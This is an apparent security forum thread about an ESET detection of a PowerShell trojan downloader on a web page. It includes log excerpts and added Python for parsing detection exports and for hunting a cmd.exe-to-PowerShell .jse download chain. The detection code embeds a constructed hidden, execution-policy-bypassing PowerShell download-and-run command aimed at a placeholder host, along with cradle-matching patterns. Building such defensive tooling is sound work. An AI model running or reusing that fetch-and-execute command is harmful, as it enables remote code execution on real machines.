itman 1,742 Posted March 30, 2017

ESET nailed it, and I couldn't think of a better example for why SSL protocol scanning needs to be enabled. Attempted access to the web site via Google produced this:

Time: 3/30/2017 3:16:03 PM
Scanner: HTTP filter
Object type: file
Object: hxxps://www.greyhathacker.net/?p=948
Threat: PowerShell/TrojanDownloader.Agent.DV trojan
Action: connection terminated
User: XXX-PC\XXX-XXXX
Information: Threat was detected upon access to web by the application: C:\Program Files\Internet Explorer\iexplore.exe
Hash: (8288B566340C2BFEC37768F5A029027DDA7C2A5B)
First seen here: 793568AC8277B3F03FAC123E0898A16AF1E103A5
Administrators Marcos 5,235 Posted March 30, 2017

Did you somehow format the threat record so that each field is on a new line? I'm asking because Hash and First seen here are shifted one line down. Correctly it should look like:

Information: Threat was detected upon access to web by the application: C:\Program Files\Internet Explorer\iexplore.exe (8288B566340C2BFEC37768F5A029027DDA7C2A5B)
Hash: 793568AC8277B3F03FAC123E0898A16AF1E103A5
First seen here:
itman 1,742 Posted March 30, 2017 (edited)

Yes. Sorry about that. Here's the unedited log:

Time;Scanner;Object type;Object;Threat;Action;User;Information;Hash;First seen here
3/30/2017 4:29:05 PM;HTTP filter;file;https://www.greyhathacker.net/?p=948;PowerShell/TrojanDownloader.Agent.DV trojan;connection terminated;XXX-PC\XXX-XXXX;Threat was detected upon access to web by the application: C:\Program Files\Internet Explorer\iexplore.exe (8288B566340C2BFEC37768F5A029027DDA7C2A5B).;C7214E6DC89BDAA2ED20CB6F6BA068BB1A3314A8;

Also, I scanned that URL at VirusTotal and it's coming up 100% clean, including NOD32 detection.

-EDIT- Just noticed the hash changed from the first detection?

Edited March 30, 2017 by itman
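For anyone who wants to work with these records rather than eyeball them: the ESET "Detected threats" export above is one semicolon-separated record per line under a header row, and the two things that caused confusion in this thread (fields sliding one line down when pasted, and the object hash differing between two detections of the same URL) are both mechanical checks. The following is an added example written for this thread, not ESET code. It assumes the column names are exactly the header the poster pasted, and the embedded sample export is constructed from the two detections discussed here (the first record's time and hash are the first post's values as Marcos corrected them). The reporting-application path and hash are pulled out of the Information field with a pattern matching the text ESET wrote there.

```python
"""Parse an ESET 'Detected threats' export and sanity-check its fields.

Added example for this thread, not ESET code. Column names are assumed to
match the header the poster pasted; SAMPLE_EXPORT is constructed from the
two detections discussed in the thread.
"""
import csv
import io
import re
from urllib.parse import urlsplit, urlunsplit

# Constructed sample: the two detections from the thread, in the column
# order of the unedited export (note the empty trailing "First seen here").
SAMPLE_EXPORT = r"""Time;Scanner;Object type;Object;Threat;Action;User;Information;Hash;First seen here
3/30/2017 3:16:03 PM;HTTP filter;file;https://www.greyhathacker.net/?p=948;PowerShell/TrojanDownloader.Agent.DV trojan;connection terminated;XXX-PC\XXX-XXXX;Threat was detected upon access to web by the application: C:\Program Files\Internet Explorer\iexplore.exe (8288B566340C2BFEC37768F5A029027DDA7C2A5B).;793568AC8277B3F03FAC123E0898A16AF1E103A5;
3/30/2017 4:29:05 PM;HTTP filter;file;https://www.greyhathacker.net/?p=948;PowerShell/TrojanDownloader.Agent.DV trojan;connection terminated;XXX-PC\XXX-XXXX;Threat was detected upon access to web by the application: C:\Program Files\Internet Explorer\iexplore.exe (8288B566340C2BFEC37768F5A029027DDA7C2A5B).;C7214E6DC89BDAA2ED20CB6F6BA068BB1A3314A8;
"""

SHA1_RE = re.compile(r"^[0-9A-Fa-f]{40}$")
# Matches "... by the application: <path> (<sha1>)" as ESET writes it in Information.
APP_RE = re.compile(r"application: (?P<path>.+?) \((?P<sha1>[0-9A-Fa-f]{40})\)")


def parse_eset_export(text):
    """Return the records as dicts keyed by the header row's field names."""
    return list(csv.DictReader(io.StringIO(text), delimiter=";"))


def extract_application(information):
    """Return (path, sha1) of the reporting application from the Information field."""
    m = APP_RE.search(information)
    return (m.group("path"), m.group("sha1")) if m else (None, None)


def validate_record(row):
    """Consistency checks; an empty list means the record looks intact.

    A line-shifted paste (as in the first post) lands the scanner's own
    hash (iexplore.exe) in the object's Hash column, which this catches.
    """
    problems = []
    object_hash = row.get("Hash", "")
    _, app_hash = extract_application(row.get("Information", ""))
    if not SHA1_RE.match(object_hash):
        problems.append("Hash field is not a 40-hex SHA-1")
    if app_hash is None:
        problems.append("Information field lacks '<application> (<sha1>)'")
    elif object_hash.upper() == app_hash.upper():
        problems.append("Hash field equals the application hash; fields look shifted")
    return problems


def distinct_hashes_by_object(rows):
    """Map each Object to the ordered list of distinct hashes seen for it.

    More than one hash for the same URL is the 'hash changed' observation:
    the content served differed between the two requests.
    """
    seen = {}
    for row in rows:
        hashes = seen.setdefault(row["Object"], [])
        if row["Hash"] and row["Hash"] not in hashes:
            hashes.append(row["Hash"])
    return seen


def defang(url):
    """Make a URL safe to paste: hxxp scheme and bracketed dots in the host."""
    parts = urlsplit(url)
    scheme = parts.scheme.replace("http", "hxxp", 1)
    host = parts.netloc.replace(".", "[.]")
    return urlunsplit((scheme, host, parts.path, parts.query, parts.fragment))


if __name__ == "__main__":
    records = parse_eset_export(SAMPLE_EXPORT)
    for r in records:
        path, sha1 = extract_application(r["Information"])
        print(r["Time"], r["Threat"], defang(r["Object"]), r["Hash"], path, sha1,
              validate_record(r) or "ok")
    for obj, hashes in distinct_hashes_by_object(records).items():
        if len(hashes) > 1:
            print("hash changed for", defang(obj), hashes)
```

Run against the real export (File > Export from the Detected threats log) by replacing SAMPLE_EXPORT with the file contents; the defanged URL is what to paste into a forum or ticket so nobody clicks it by accident.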
itman 1,742 Posted March 31, 2017 (edited)

@Marcos What's the verdict on this? Curious, since to date web site ransomware has been delivered by exploit. Wondering if a new vulnerability has been found in IE11? Also, since the hash changes, it looks like polymorphic ransomware to me.

-EDIT- This also might be related: http://www.zdnet.com/article/skype-served-up-malware-through-in-app-malicious-ads/ i.e. Skype users hit by ransomware through in-app malicious ads. I don't use Skype, but what caught my eye about this attack was:

The "fake Flash" ad, designed to target Windows machines, pushed a download, which when opened would trigger obfuscated JavaScript. The code starts a new command line, then deletes the application that the user just opened, and runs a PowerShell command, which then downloads a JavaScript Encoded Script (JSE) from a domain that no longer exists, likely one of many disposable domains used to hide an attacker's operations.

Don't see why a download could not be attempted upon web site access, e.g. a drive-by download?

Edited March 31, 2017 by itman
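The quoted ZDNet description is a process chain, and that is how a detection team would hunt for it regardless of which site or ad served it: a PowerShell process whose parent is cmd.exe, whose parent's command line deletes the file the user opened, and whose own command line carries a download cradle with a .jse target. The following is an added example for this thread, not code from ESET, ZDNet or the incident. It assumes only the minimum a Sysmon Event ID 1 or EDR process feed gives you (pid, ppid, image path, command line); the events, paths and the example.invalid domain are constructed, and the cradle pattern generalises beyond the quoted text to the common PowerShell download primitives.

```python
"""Flag the cmd.exe -> PowerShell -> .jse download chain from the quoted
ZDNet description over constructed process-creation events.

Added example for this thread, not ESET, ZDNet or incident code. Assumes
a Sysmon Event ID 1 / EDR-style feed with pid, ppid, image and command
line. All events below are constructed; example.invalid is a placeholder.
"""
import ntpath
import re
from collections import namedtuple

Event = namedtuple("Event", "pid ppid image cmdline")

# Constructed PowerShell command line: fetch a .jse to %TEMP% and run it.
PS_CMD = ("powershell -w hidden -ep bypass -c \"(New-Object Net.WebClient)"
          ".DownloadFile('http://example.invalid/a/x.jse','C:\\Users\\u\\AppData\\Local\\Temp\\x.jse');"
          " wscript C:\\Users\\u\\AppData\\Local\\Temp\\x.jse\"")

# Constructed chain: the opened "fake Flash" download spawns cmd.exe, which
# deletes that file and starts the hidden PowerShell. A benign PowerShell
# started from explorer.exe (pid 50) is included as a control.
SAMPLE_EVENTS = [
    Event(100, 50, "C:\\Users\\u\\Downloads\\FlashPlayer_update.exe", "FlashPlayer_update.exe"),
    Event(101, 100, "C:\\Windows\\System32\\cmd.exe",
          'cmd.exe /c del /q "C:\\Users\\u\\Downloads\\FlashPlayer_update.exe" & ' + PS_CMD),
    Event(102, 101, "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", PS_CMD),
    Event(200, 50, "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "powershell Get-Process"),
]

POWERSHELL = {"powershell.exe", "pwsh.exe"}
CRADLE_RE = re.compile(r"DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|Start-BitsTransfer", re.I)
JSE_RE = re.compile(r"\.jse\b", re.I)
STEALTH_RE = re.compile(r"-w(?:indowstyle)?\s+hidden|-e(?:xecutionpolicy|p)\s+bypass", re.I)
DELETE_RE = re.compile(r"\bdel\b|\berase\b|Remove-Item", re.I)


def basename(image):
    return ntpath.basename(image).lower()


def indicators(ev, by_pid):
    """Return the chain indicators present on one PowerShell process event."""
    found = []
    if CRADLE_RE.search(ev.cmdline):
        found.append("download-cradle")
    if JSE_RE.search(ev.cmdline):
        found.append("jse-payload")
    if STEALTH_RE.search(ev.cmdline):
        found.append("hidden-or-bypass")
    parent = by_pid.get(ev.ppid)
    if parent is not None and basename(parent.image) == "cmd.exe":
        found.append("parent-cmd")
        if DELETE_RE.search(parent.cmdline):
            # The "deletes the application that the user just opened" step.
            found.append("parent-deletes-file")
    return found


def find_chains(events, min_indicators=3):
    """Return [(pid, indicators)] for PowerShell events that match the chain.

    Requires a download cradle plus at least min_indicators in total, so a
    lone hidden-window flag or a cmd.exe parent does not page anyone.
    """
    by_pid = {e.pid: e for e in events}
    hits = []
    for ev in events:
        if basename(ev.image) not in POWERSHELL:
            continue
        found = indicators(ev, by_pid)
        if "download-cradle" in found and len(found) >= min_indicators:
            hits.append((ev.pid, found))
    return hits


if __name__ == "__main__":
    for pid, found in find_chains(SAMPLE_EVENTS):
        print(f"pid {pid}: {', '.join(found)}")
```

The threshold is deliberately tunable: admins do run PowerShell from cmd.exe, and build scripts do download files, so the cradle alone is a lead rather than an alert, while cradle plus hidden window plus a parent that just deleted the launcher is the chain the article describes.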
itman 1,742 Posted April 1, 2017

FYI - Fortinet is now detecting this greyhathacker URL as malicious.
itman 1,742 Posted April 2, 2017

FYI - Quttera confirms: